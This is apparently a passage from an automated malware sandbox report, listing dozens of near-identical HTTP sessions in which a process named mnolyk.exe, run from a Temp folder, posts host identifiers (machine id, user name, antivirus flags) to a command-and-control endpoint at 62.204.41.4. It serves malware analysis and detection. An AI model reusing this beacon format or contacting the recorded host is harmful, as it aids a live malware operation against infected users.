                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:15.676393032 CET173INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      580192.168.2.75027562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:38.709285021 CET695OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:38.773197889 CET695INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      581192.168.2.75027662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:38.947586060 CET696OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:39.010864973 CET696INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      582192.168.2.75027762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:39.183923960 CET697OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:39.246810913 CET697INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      583192.168.2.75027862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:39.423463106 CET698OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:39.487081051 CET698INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      584192.168.2.75027962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:39.671695948 CET699OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:39.735544920 CET699INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      585192.168.2.75028062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:39.926137924 CET700OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:39.991081953 CET700INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      586192.168.2.75028162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:40.172673941 CET701OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:40.234992981 CET701INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      587192.168.2.75028262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:40.408973932 CET702OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:40.473009109 CET702INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      588192.168.2.75028362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:40.653335094 CET703OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:40.716855049 CET703INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      589192.168.2.75028462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:40.912416935 CET704OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:40.976260900 CET704INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      59192.168.2.74975462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:15.855344057 CET174OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:15.920128107 CET174INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      590192.168.2.75028562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:41.160718918 CET705OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:41.225387096 CET705INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      591192.168.2.75028662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:41.402786016 CET706OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:41.466211081 CET706INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      592192.168.2.75028762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:41.643241882 CET707OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:41.706674099 CET707INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      593192.168.2.75028862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:41.886672974 CET708OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:41.951152086 CET708INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      594192.168.2.75028962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:42.121098995 CET709OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:42.188054085 CET709INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      595192.168.2.75029062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:42.372267008 CET710OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:42.435712099 CET710INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      596192.168.2.75029162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:42.607616901 CET711OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:42.672527075 CET711INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      597192.168.2.75029262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:42.847677946 CET712OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:42.913094997 CET712INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
